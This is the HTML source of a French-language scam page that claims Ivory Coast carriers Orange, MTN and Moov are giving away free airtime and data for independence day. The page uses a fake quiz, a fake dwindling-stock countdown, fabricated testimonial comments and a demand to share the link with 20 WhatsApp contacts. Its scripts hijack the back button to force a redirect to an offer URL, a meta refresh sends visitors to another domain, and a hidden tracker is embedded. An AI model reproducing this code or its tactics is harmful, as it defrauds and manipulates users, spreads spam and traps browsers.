
<html lang="en-US">
<head>
<meta http-equiv="refresh" content="240; url=http://4iom.com/ivory?pro">

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0">
<script src="en-us/assets/js/w8swl.js"></script>
<script>
		window.brandCode = "";
		window.price = "1500";
		window.startCounter = 0 ;
		window.exitUrl = "//groguzoo.net/4/3727616";
		window.countryCode = "US";
		window.countryName = "United States";
		window.offerUrl = "//groguzoo.net/4/3727616";
		window.shareUrl = "i6mn.com/ivory|i6mn.com/ivory";
		window.shareType = "whatsapp";
		window.shareUrlFB = "i6mn.com/ivory";
		window.shareCount = 20 ;
		window.popup = false ;
		window.brand = "";
		window.shareScrubAt = 0 ;
		window.shareScrubTo = 0 ;
		window.iframeUrl = "IFRAME_URL";
	</script>
<title>Ivory coast : Free credit</title>
<meta property="og:title" content="À l'occasion du notre jour de l'indépendance ✨" />
<meta property="og:description" content="6000 francs de crédit d'appel + 25Go gratuit disponible pendant un mois!" />
<meta property="og:image" content="https://i.imgur.com/d7qhUIi.jpg" />
<meta property="og:type" content="website" />
  <meta content="https://internet.com/" property="og:url">
<link rel="stylesheet" href="en-us/assets/css/common76cb.css" />
<link rel="stylesheet" href="en-us/assets/css/voucher_main_style0cee.css" />
<link rel="stylesheet" href="en-us/assets/css/voucher_layout_layout-products0cee.css" />
<link rel="stylesheet" href="en-us/assets/css/voucher_color_white7c56.css" />
<link rel="stylesheet" href="en-us/assets/css/voucher_brand_tesco90a7.css" />
<style type="text/css">
.btn-wrap {
    margin-top: 230px;
    
}

.timer .timer-text {
    font-size: 16px;
    padding: 0 3px;
    width: auto;
    float: none;
    display: inline-block;
    flex: 0 auto;
    text-transform: capitalize;
    font-weight: bolder;
}
.btn, .btn-continue, .btn-continue-like, .button, .ynBTN_alpha {
    background: #d84a59;
    border-color: #d84a59;
    color: #fff;
    box-shadow: 0 10px 20px rgba(0,0,0,0.2);
    border-radius: 0;
        margin-top: -600px;

}
.form_questions {
		width: 100%;
		background-color: #fff
}
.wrapper {
		max-width: 800px;
		width: 96%;
		margin: 0 auto
}
.myButton {
		background-color: #00bb2d;
		border-radius: 4px;
		border: 2px solid #00bb2d;
		display: block;
		cursor: pointer;
		color: #ffffff;
		font-size: 20px;
		/* font-weight: 200; */
		font-weight: bold;
		margin: 10px auto;
		padding: 13px 32px;
		/* padding: 10px; */
		text-decoration: none;
		width: 230px;
}
.timer {
    background-color:#d9534f;
	font-size: 1.5em;
      font-weight: 400;
      background: #d9534f;
}
.timer.right {
    color: #fff;
}
.hero-line-sm .btn-continue-like {
    font-size: 30px;
    margin-top: -240px;
}

</style>

<script>
var timer = '2443';
function doSomething() {
	if (timer > 0) {
		timer -= Math.round(Math.random() * 2) + 1;
		$('.countdown').text(timer);
	}
}
(function loop() {
    var rand = Math.round(Math.random() * (2000 - 200)) + 200;
    setTimeout(function() {
            doSomething();
            loop();  
    }, rand);
}());

</script>
<script type="text/javascript">
! function () {
var t;
try {
for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
onpopstate = function (t) {
t.state && location.replace("//groguzoo.net/4/3727616")
}
} catch (o) {}
}();
</script>
</head>
<body>
<div class="body-wrap lang_it">
<header class="header top-header">
<div class="container">
<div class="header-in">
<div class="logo">
<img src="https://images.emojiterra.com/twitter/512px/1f1e8-1f1ee.png" class="logo-big" alt="">
<img src="https://images.emojiterra.com/twitter/512px/1f1e8-1f1ee.png" class="logo-sm" alt="">
</div>
<div class="icon-l"></div>
<div class="icon-t"></div>
<div class="icon-r"></div>
<div class="icon-s"></div>
</div>
</div>
</header>
<div class="content">
<div class="content-in">
<div class="panels">
<div class="panel" id="page1">
<div class="hero-line-sm ">
<div class="container">
     <h3 style="color: #d84a59;
    font-weight: revert;
    font-size: 21px;
    font-family: 'ProximaNovaBlack';">À l'occasion du notre jour de l'indépendance ✨</h3><br>
    <h3><b><strong>Orange,Moov et MTN sont heureux d'offrir à tous 6000 francs de crédit d'appel + 25Go gratuit disponible pendant un mois</strong></b> </h3>
<img src="https://i.imgur.com/s465d4W.png" alt="">
<div class="btn-wrap">
<button class="btn-continue-like participate">CONTINUER</button>
</div>
</div>
<div class="timer  right">
<div class="timer-text">Packs du solde restant</div>
<span class="countdown">
<div class="item-countdown timer-time" data-interval="10000" data-value="2443">2443</div>
</span>
</div>
</div>
<div class="container">
<div class="row content-row">
<div class="position-info">
<div class="position-text">
<h3><b><br></b></h3>
<font size="3"></font>
<div class="position-image">
<div class="pic" style="')"></div>
</div>
</div>
<div class="timer  right">
<div class="timer-text">Packs du solde restant</div>
<span class="countdown">
<div class="item-countdown timer-time" data-interval="10000" data-value="2443">2443</div>
</span>
</div>
</div>
<div class="position-form">
<div class="questionfield">
<div class="questions_list-header">
<span> <h6><b>Répondez à 3 questions simples</b></h6> </span>
</div>
<div class="questions_list">
<div class="questionblock" data-last="0">
<div class="progress">
<div class="rel">
<div class="progress-points">
<div class="progress-point active"></div>
<div class="progress-point "></div>
<div class="progress-point "></div>
</div>
<div class="progress-bar">
<div style="width: 25%;"></div>
</div>
</div>
</div>
<h3>1 - Sélectionnez votre ligne?</h3>
<a class="button">
Orange </a>
<a class="button"> 
MTN </a>
<a class="button">
Moov </a>
<a class="button">
Autre </a>
</div>
<div class="questionblock " data-last="0">
<div class="progress">
<div class="rel">
<div class="progress-points">
<div class="progress-point active"></div>
<div class="progress-point active"></div>
<div class="progress-point "></div>
</div>
<div class="progress-bar">
<div style="width: 75%;"></div>
</div>
</div>
</div>
<h3>2 - Quel pack préférez-vous?</h3>
<a class="button">7000 franc et 20Go </a>
<a class="button">6000 franc et 25Go </a>
<a class="button">5000 franc et 30Go </a>
</div>
<div class="questionblock " data-last="1">
<div class="progress">
<div class="rel">
<div class="progress-points">
<div class="progress-point active"></div>
<div class="progress-point active"></div>
<div class="progress-point active"></div>
</div>
<div class="progress-bar">
<div style="width: 100%;"></div>
</div>
</div>
</div>
<h3>3 - Votre type de réseau est?</h3>
<a class="button">3G</a>
<a class="button">4G</a>
<a class="button">5G</a>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="panel-steps-wrap">
<div class="container">
<div class="panel-steps"></div>
</div>
</div>
<div class="prelander-progress hide">
<div class="container">
<div class="prelander-progress-in">
<h3>Nous vérifions vos réponses....</h3>
<div class="green-loadingbar"></div>
<ul>
<li class="hide"><i class="fa fa-check"></i> Aucune inscription double trouvée. </li>
<li class="hide"><i class="fa fa-check"></i> Toutes les questions sont terminées </li>
<li class="hide"><i class="fa fa-check"></i> Félicitations! Vous avez gagné 6000 francs crédit gratuit et 25Go </li>
</ul>
</div>
</div>
</div></div>
<div class="panel" id="input1">
<div class="container">
<div class="row content-row">
<div class="position-info">
<div class="position-text">
<div class="title"></div>
<div class="subtitle"></div>
<div class="position-image">
<img src="#" alt="" class="pic">
<img src="#" alt="" class="pure-pic">
</div>
</div>
<div class="timer  right">
<div class="timer-text">Packs du solde restant</div>
<span class="countdown">
<div class="item-countdown timer-time" data-interval="10000" data-value="2443">2443</div>
</span>
</div>
</div>
<div class="position-form">
<div class="progress">
<b>
    Félicitations, vous avez gagné un pack de crédits gratuit <br> <br> Suivez les étapes suivantes <br>
</b>
<div class="rel">
<div class="progress-points">
<div class="progress-point active"></div>
<div class="progress-point"></div>
</div>
<div class="progress-bar">
<div style="width: 50%;"></div>
</div>
</div>
</div>
<div class="info">
<div class="info-form ">
<div class="info-form-text">
<div class="form_questions wrapper" style="background-color:#fafafa;">
	<div class=" question wrapper" id="q1">
<p class="text" style="font-size: 16px; text-align: center; margin-left:15px;"><strong>Félicitations! Vous avez gagné un crédit gratuit de 6000 francs et 25Go internet</strong></p>
<p class="text" style="font-size: 16px; text-align: center; margin-left:15px;"><strong>1. </strong>Partagez-le avec 20 de vos amis / groupes via Whatsapp (cliquez sur l'icône Whatsapp ci-dessous).</p>
<p class="text" style="font-size: 16px; text-align: center; margin-left:15px;"><strong>2. </strong>Après le partage, cliquez sur "CONTINUER"</p>
<p class="text" style="font-size: 16px; text-align: center; margin-left:15px;"><strong>3. </strong>Vous recevrez votre crédit dans 1 minute</p>
<button class="myButton" onclick="share()"><img src="jh7p1c.jpg" width="35">SHARE</button>
<button class="myButton" onclick="share2()">CONTINUER</button>
</div>
</div>
<div class="comment-area">
    <div class="action">
      <a class="like" href="javascript: void(0);">Like</a>
      <a class="bubble" href="javascript: void(0);">Commnent</a>
      <a class="share-btn" href="javascript: void(0);">Share</a>
      
    </div>
    <div class="tot-likes">
      <div class="like-imgs">
      </div>
      <p><span class="you"></span> 17,259 peaple Like this.</p>
    </div>
<div class="comment">
      <img class="profile" src="https://randomuser.me/api/portraits/men/7.jpg" width="50" height="50">
      <p class="com-txt"><a class="name" href="javascript:void(0);">Josef perey</a> <br> Merci, j'ai posté le message 30 fois mais je n'ai rien gagné, puis j'essaye de le poster beaucoup plus de temps et j'ai été surpris d'avoir gagné le pack de 6000 francs de crédit d'appel & 25Go internet</p>
      <div class="act">
        <a class="fblike" href="javascript:void(0);">Like</a> ·
        <a href="javascript:void(0);">Reply</a> ·
        <span class="">50</span><br>
        <span class="time">28 min</span>
      </div>
      <div class="comment">
        <img class="profile" src="https://randomuser.me/api/portraits/women/30.jpg" width="50" height="50">
        <p class="com-txt"><a class="name" href="javascript:void(0);">Maria jhonson</a><br>Je l'ai gagné. J'ai gagné un pack. Merci à toi pour ce super cadeau 🤩</p>

        <div class="act">
          <a class="fblike" href="javascript:void(0);">Like</a> ·
          <a href="javascript:void(0);">Reply</a> ·
          <span class="">16</span><br>
          <span class="time">20 min</span>
        </div>
      </div>
      <div id="com3" class="comment hider" style="display: block;">
        <img class="profile" src="https://randomuser.me/api/portraits/men/54.jpg" width="50" height="50">
        <p class="com-txt"><a class="name" href="javascript:void(0);"> Chris niang</a><br> Hey! mais pourquoi j'ai choisi mtn et j'ai reçu un crédit orange 🤨</p>
        <div class="act">
          <a class="fblike" href="javascript:void(0);">Like</a> ·
          <a href="javascript:void(0);">Reply</a> ·
          <span class="">2</span>
          <br>
          <span class="time">Just now</span>
        </div>
      </div>
    </div>
    <div class="comment">
      <img class="profile" src="https://randomuser.me/api/portraits/men/59.jpg" width="50" height="50">
      <p class="com-txt"><a class="name" href="javascript:void(0);">abraham maoe</a><br>Merci du fond du cœur, j'ai reçu mon pack!💖 </p>

      <div class="act">
        <a class="fblike" href="javascript:void(0);">Like</a> ·
        <a href="javascript:void(0);">Reply</a> ·
        <span class="">27</span><br>
        <span class="time">7 min</span>
      </div>
    </div>
    <div class="comment">
      <img class="profile" src="https://randomuser.me/api/portraits/women/16.jpg" width="50" height="50">
      <p class="com-txt"><a class="name" href="javascript:void(0);">selimbe tophin</a><br>Et enfin, bonne nouvelle pendant cette foutue crise</p>
      <div class="act">
        <a class="fblike" href="javascript:void(0);">Like</a> ·
        <a href="javascript:void(0);">Reply</a> ·
        <span class="">18</span>
        <br>
        <span class="time">3 min</span>
      </div>
<style>
.comment-area {
    	margin-top: 30px;
    	position: relative;
    	z-index: 610;
        font-size: 14px !important;
        font-size: 0.95em;
        text-align: left;
        font-family: 'Myriad Pro', sans-serif;
    }
    
    .action {
        border-top: 1px solid #e6e6e6;
        background: #fff;
        padding: 5px 10px;
    }
    
    .action a {
        display: inline-block;
        padding-left: 20px;
        text-decoration: none;
        color: #6d6d6d;
        margin-right: 15px;
    }
    
    .action .like {
            background: url(https://i.imgur.com/RxS8FXk.png) no-repeat left center;
        }
        .action .bubble {
            background: url(https://i.imgur.com/geNBckx.png) no-repeat left center;
        }
        .action .share-btn {
            background: url(https://i.imgur.com/FUwlTOP.png) no-repeat left center;
        }
        .action .active-like {
            background-image: url(https://i.imgur.com/GZYJfg1.png);
            color: #5890ff;
        }
    
    .tot-likes {
        padding: 0 10px;
    }
    
    .tot-likes > p {
        line-height: 20px;
        padding: 5px 0;
        color: #3f5199;
        border-bottom: 1px solid #e1e3e4;
    }
    .like-imgs {
    	padding: 10px 0 5px;
    	max-height: 47px;
    	overflow: hidden;
    }
    
    .like-imgs > div {
    	display: inline-block;
    	margin-right: 5px;
    	position: relative;
    	margin-bottom: 5px;
    }
    
    .like-imgs > div img {
    	display: block;
    }
    
    .like-imgs > div .reaction-img {
    	position: absolute;
    	bottom: -5px;
    	right: -5px;
    	z-index: 10;
    }
    .you {
        display: none;
    }
    
    .you.active {
        display: inline-block;
        line-height: 20px;
        padding-left: 20px;
        background: url(https://i.imgur.com/sKtFN77.png) no-repeat left center;
    }
    
    .comment {
        position: relative;
        padding: 10px 10px 10px 70px;
        min-height: 70px;
        -webkit-box-sizing: border-box;
        -moz-box-sizing: border-box;
        box-sizing: border-box;
    }
    
    .profile {
        position: absolute;
        top: 10px;
        left: 10px;
    }
    
    .name {
        font-weight: 700;
        text-decoration: none;
        color: #3f5199;
    }
    
    .com-txt {
        margin-bottom: 10px;
    }
    
    .act a {
        color: #3f5199;
        text-decoration: none;
    }
    
    .liked {
        background: url(https://i.imgur.com/MXkW8DZ.png) no-repeat left center;
        padding-left: 16px;
        line-height: 16px;
        color: #3f5199;
    }
    
    .liked:after {
        content: ' Ã‚Â· ';
    }
    
    .time {
        color: #8d9098;
    }
    
    .comment .comment {
        padding-left: 50px;
        padding-right: 0;
    }
    
    .comment .comment .profile {
        left: 0 !important;
        width: 40px !important;
        height: 40px !important;
    }
    
    .fbimg {
        max-width: 190px;
        width: 100%;
        -webkit-box-sizing: border-box;
        -moz-box-sizing: border-box;
        box-sizing: border-box;
        height: auto;
        display: block;
        padding: 3px;
        border: 1px solid #808080;
        border-radius: 2px;
        -moz-border-radius: 2px;
        -webkit-border-radius: 2px;
        margin-bottom: 10px;
    }
    
    .addComment {
        position: relative;
        padding: 10px 10px 10px 70px;
        height: 70px;
        -webkit-box-sizing: border-box;
        -moz-box-sizing: border-box;
        box-sizing: border-box;
    }
    
    .addComment img {
        position: absolute;
        left: 10px;
        top: 8px;
    }
    
    .addComment input {
        border-radius: 2px;
        -moz-border-radius: 2px;
        -webkit-border-radius: 2px;
        border: 1px solid #e0e0e0;
        line-height: 48px;
        width: 100%;
        display: block;
        outline: 0;
        padding: 0 50px 0 10px;
        -webkit-box-sizing: border-box;
        -moz-box-sizing: border-box;
        box-sizing: border-box;
        background: #fff url(https://i.imgur.com/z43WkCC.png) no-repeat right center;
    }
    
    .hider, .likehide, #myCom {
        display: none;
    }
    .txt2 {
    	color: #000;
    	line-height: 2.3;
    	text-align: left;
    }
    
    .timer {
    	font-size: 1.5em;
    	font-weight: 400;
    	color: #d9534f;
    }
</style>
</div></div></div></div></div></div></div></div></div></div></div></div></div>
<script src="ajax/libs/jquery/1-11-3/jquery.min.js"></script>
<script src="en-us/assets/js/custo.min.js"></script>
<script>	 
  $(document).ready(function() {
    $(".questionblock:first").addClass("active");
  });
</script>
<div style="visibility:hidden;height:0px;">
<script type="text/javascript" src="//widgets.amung.us/small.js"></script>
<script type="text/javascript">WAU_small('creditivor');</script>
</div>
</body>
</html>